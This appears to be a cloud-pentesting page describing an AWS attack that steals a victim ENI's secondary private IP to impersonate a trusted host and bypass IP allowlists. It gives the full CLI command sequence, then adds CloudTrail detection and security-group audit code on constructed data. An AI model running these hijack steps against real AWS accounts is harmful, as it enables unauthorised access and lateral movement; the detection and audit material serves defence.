AWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)

Abuse ec2:UnassignPrivateIpAddresses and ec2:AssignPrivateIpAddresses to steal a victim ENI’s secondary private IP and move it to an attacker ENI in the same subnet/AZ. Many internal services and security groups gate access by specific private IPs. By moving that secondary address, the attacker impersonates the trusted host at L3 and can reach allowlisted services.

Prereqs:

  • Permissions: ec2:DescribeNetworkInterfaces, ec2:UnassignPrivateIpAddresses on the victim ENI ARN, and ec2:AssignPrivateIpAddresses on the attacker ENI ARN.
  • Both ENIs must be in the same subnet/AZ. The target address must be a secondary IP (primary cannot be unassigned).

Variables:

  • REGION=us-east-1
  • VICTIM_ENI=
  • ATTACKER_ENI=
  • PROTECTED_SG= # SG on a target service that allows only $HIJACK_IP
  • PROTECTED_HOST=

Steps:

  1. Pick a secondary IP from the victim ENI
```bash
# --output text prints the matching addresses tab-separated on one line, so split them before taking the first
aws ec2 describe-network-interfaces --network-interface-ids "$VICTIM_ENI" --region "$REGION" \
  --query 'NetworkInterfaces[0].PrivateIpAddresses[?Primary==`false`].PrivateIpAddress' \
  --output text | tr '\t' '\n' | head -n1 | tee HIJACK_IP
export HIJACK_IP=$(cat HIJACK_IP)
```
  2. Ensure the protected host allows only that IP (idempotent). If using SG-to-SG rules instead, skip.
```bash
aws ec2 authorize-security-group-ingress --group-id "$PROTECTED_SG" --protocol tcp --port 80 \
  --cidr "$HIJACK_IP/32" --region "$REGION" || true
```
  3. Baseline: from the attacker instance (e.g. over SSM/SSH), a request to PROTECTED_HOST should fail while the source is still the attacker's own IP
```bash
curl -sS --max-time 3 "http://$PROTECTED_HOST" || true
```
  4. Unassign the secondary IP from the victim ENI
```bash
aws ec2 unassign-private-ip-addresses --network-interface-id "$VICTIM_ENI" \
  --private-ip-addresses "$HIJACK_IP" --region "$REGION"
```
  5. Assign the same IP to the attacker ENI (on AWS CLI v1 add --allow-reassignment)
```bash
aws ec2 assign-private-ip-addresses --network-interface-id "$ATTACKER_ENI" \
  --private-ip-addresses "$HIJACK_IP" --region "$REGION"
```
  6. Verify ownership moved
```bash
aws ec2 describe-network-interfaces --network-interface-ids "$ATTACKER_ENI" --region "$REGION" \
  --query 'NetworkInterfaces[0].PrivateIpAddresses[].PrivateIpAddress' --output text | grep -w "$HIJACK_IP"
```
  7. From the attacker instance, source-bind to the hijacked IP to reach the protected host (ensure the IP is configured on the OS; if not, add it with `ip addr add $HIJACK_IP/<mask> dev eth0`)
```bash
curl --interface "$HIJACK_IP" -sS "http://$PROTECTED_HOST" -o /tmp/poc.out && head -c 80 /tmp/poc.out
```
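The sequence above leaves a distinctive pair of API calls in CloudTrail: an UnassignPrivateIpAddresses on one ENI followed shortly by an AssignPrivateIpAddresses of the same address on a different ENI. The following detection is an added example written for this page, not code from HackTricks or AWS; it assumes EC2 records these calls with `requestParameters.networkInterfaceId` and `requestParameters.privateIpAddressesSet.items[].privateIpAddress` (check the field names against your own trail), and all records it processes are constructed sample data.

```python
"""Added example (not part of the original page): correlate CloudTrail records
to spot a secondary private IP that is unassigned from one ENI and assigned to
a different ENI shortly afterwards, which is the move the steps above perform.

Assumptions: EC2 records these calls with eventName UnassignPrivateIpAddresses /
AssignPrivateIpAddresses and with requestParameters.networkInterfaceId plus
requestParameters.privateIpAddressesSet.items[].privateIpAddress; verify the
field names against your own trail before relying on them. All records below
are constructed sample data."""
from datetime import datetime

CLOUDTRAIL_TIME = "%Y-%m-%dT%H:%M:%SZ"


def _record(event_time, name, actor, eni, ips):
    """Build a constructed CloudTrail-style record (sample data only)."""
    return {
        "eventTime": event_time,
        "eventName": name,
        "userIdentity": {"arn": actor},
        "requestParameters": {
            "networkInterfaceId": eni,
            "privateIpAddressesSet": {"items": [{"privateIpAddress": ip} for ip in ips]},
        },
    }


# Constructed sample trail: one hijack, one benign re-assign onto the same ENI,
# and one slow move that only shows up when no time window is applied.
SAMPLE_EVENTS = [
    _record("2024-01-01T10:00:00Z", "UnassignPrivateIpAddresses",
            "arn:aws:iam::111111111111:user/attacker", "eni-victim0000000001", ["10.0.1.50"]),
    _record("2024-01-01T10:00:20Z", "AssignPrivateIpAddresses",
            "arn:aws:iam::111111111111:user/attacker", "eni-attacker000000001", ["10.0.1.50"]),
    _record("2024-01-01T10:05:00Z", "UnassignPrivateIpAddresses",
            "arn:aws:iam::111111111111:role/ops", "eni-app0000000000001", ["10.0.1.77"]),
    _record("2024-01-01T10:05:30Z", "AssignPrivateIpAddresses",
            "arn:aws:iam::111111111111:role/ops", "eni-app0000000000001", ["10.0.1.77"]),
    _record("2024-01-01T11:00:00Z", "UnassignPrivateIpAddresses",
            "arn:aws:iam::111111111111:role/ops", "eni-db00000000000001", ["10.0.1.60"]),
    _record("2024-01-01T13:00:00Z", "AssignPrivateIpAddresses",
            "arn:aws:iam::111111111111:role/ops", "eni-other000000000001", ["10.0.1.60"]),
]


def _parse(ev):
    """Extract the fields the correlation needs from one record."""
    params = ev.get("requestParameters") or {}
    items = (params.get("privateIpAddressesSet") or {}).get("items") or []
    return {
        "time": datetime.strptime(ev["eventTime"], CLOUDTRAIL_TIME),
        "name": ev["eventName"],
        "eni": params.get("networkInterfaceId"),
        "ips": [i["privateIpAddress"] for i in items],
        "actor": (ev.get("userIdentity") or {}).get("arn", "unknown"),
    }


def find_ip_moves(events, window_seconds=600):
    """Return one finding per IP that left one ENI and landed on a different ENI.

    A re-assign back onto the originating ENI is ignored (normal maintenance).
    window_seconds limits how long after the unassign the assign may occur;
    pass None to report moves regardless of delay."""
    relevant = ("UnassignPrivateIpAddresses", "AssignPrivateIpAddresses")
    parsed = sorted((_parse(e) for e in events if e.get("eventName") in relevant),
                    key=lambda p: p["time"])
    pending = {}    # ip -> most recent unassign record for that ip
    findings = []
    for p in parsed:
        if p["name"] == "UnassignPrivateIpAddresses":
            for ip in p["ips"]:
                pending[ip] = p
            continue
        for ip in p["ips"]:
            prev = pending.pop(ip, None)      # the assign consumes the pending unassign
            if prev is None or prev["eni"] == p["eni"]:
                continue
            delta = (p["time"] - prev["time"]).total_seconds()
            if window_seconds is not None and delta > window_seconds:
                continue
            findings.append({
                "ip": ip,
                "from_eni": prev["eni"],
                "to_eni": p["eni"],
                "seconds": delta,
                "unassigned_by": prev["actor"],
                "assigned_by": p["actor"],
            })
    return findings


if __name__ == "__main__":
    for f in find_ip_moves(SAMPLE_EVENTS):
        print(f"ALERT: {f['ip']} moved {f['from_eni']} -> {f['to_eni']} "
              f"in {f['seconds']:.0f}s by {f['assigned_by']}")
```

The window keeps routine re-homing (an address unassigned and re-added to the same interface, or moved hours later during a planned change) out of the alert stream; an assignment of the same address to a different ENI within minutes, especially by a principal that does not normally touch ENIs, is what this technique looks like from the trail.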

Impact

  • Bypass IP allowlists and impersonate trusted hosts within the VPC by moving secondary private IPs between ENIs in the same subnet/AZ.
  • Reach internal services that gate access by specific source IPs, enabling lateral movement and data access.
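Because only secondary addresses can be unassigned, the allowlist entries at risk are the /32 rules that point at a secondary private IP rather than at a primary one (or that use SG-to-SG references, which this technique does not touch). The audit below is an added example, not code from the page or from AWS: it walks DescribeSecurityGroups-style rules against a DescribeNetworkInterfaces-style inventory and classifies each single-host CIDR. The response field names used (`IpPermissions[].IpRanges[].CidrIp`, `PrivateIpAddresses[].Primary`) are the EC2 API's; the data is constructed.

```python
"""Added example (not part of the original page): audit security-group ingress
rules for /32 allowlist entries that point at a secondary private IP, i.e. an
address that can be moved between ENIs in the same subnet as described above.
Input shapes follow the EC2 DescribeSecurityGroups / DescribeNetworkInterfaces
responses; the sample data below is constructed."""
import ipaddress

# Constructed describe-network-interfaces style inventory.
SAMPLE_ENIS = [
    {"NetworkInterfaceId": "eni-trusted000000001", "SubnetId": "subnet-aaa",
     "PrivateIpAddresses": [{"PrivateIpAddress": "10.0.1.10", "Primary": True},
                            {"PrivateIpAddress": "10.0.1.50", "Primary": False}]},
    {"NetworkInterfaceId": "eni-other000000000001", "SubnetId": "subnet-aaa",
     "PrivateIpAddresses": [{"PrivateIpAddress": "10.0.1.11", "Primary": True}]},
]

# Constructed describe-security-groups style rules on a protected service.
SAMPLE_SGS = [
    {"GroupId": "sg-protected00000001", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 80, "ToPort": 80,
         "IpRanges": [{"CidrIp": "10.0.1.50/32"}, {"CidrIp": "10.0.1.10/32"},
                      {"CidrIp": "10.0.9.9/32"}, {"CidrIp": "10.0.0.0/16"}],
         "UserIdGroupPairs": []},
        # SG-to-SG reference: not IP based, so not affected by an IP move
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "IpRanges": [],
         "UserIdGroupPairs": [{"GroupId": "sg-client0000000001"}]},
    ]},
]


def audit_host_allowlists(security_groups, network_interfaces):
    """Classify every single-host ingress CIDR as secondary-ip (movable via
    Unassign/Assign), primary-ip (cannot be unassigned) or unknown-ip (no ENI
    currently holds it). SG-referencing rules and wider CIDRs are skipped."""
    owner = {}
    for eni in network_interfaces:
        for addr in eni.get("PrivateIpAddresses", []):
            owner[addr["PrivateIpAddress"]] = (eni["NetworkInterfaceId"], bool(addr.get("Primary")))
    findings = []
    for sg in security_groups:
        for perm in sg.get("IpPermissions", []):
            for rng in perm.get("IpRanges", []):
                net = ipaddress.ip_network(rng["CidrIp"], strict=False)
                if net.prefixlen != net.max_prefixlen:
                    continue    # only single-host allowlist entries are of interest
                ip = str(net.network_address)
                eni, primary = owner.get(ip, (None, False))
                kind = "unknown-ip" if eni is None else ("primary-ip" if primary else "secondary-ip")
                findings.append({"sg": sg["GroupId"], "port": perm.get("FromPort"),
                                 "ip": ip, "eni": eni, "kind": kind})
    return findings


def movable_allowlist_entries(security_groups, network_interfaces):
    """Only the entries a principal with Unassign/Assign rights could take over."""
    return [f for f in audit_host_allowlists(security_groups, network_interfaces)
            if f["kind"] == "secondary-ip"]


if __name__ == "__main__":
    for f in movable_allowlist_entries(SAMPLE_SGS, SAMPLE_ENIS):
        print(f"{f['sg']} port {f['port']}: {f['ip']}/32 is a secondary IP on {f['eni']}")
```

Entries reported as secondary-ip are the ones to migrate to SG-to-SG references (or to lock down with resource-level IAM policies on ec2:AssignPrivateIpAddresses and ec2:UnassignPrivateIpAddresses); unknown-ip entries are stale rules worth removing, since a newly assigned address would inherit their access.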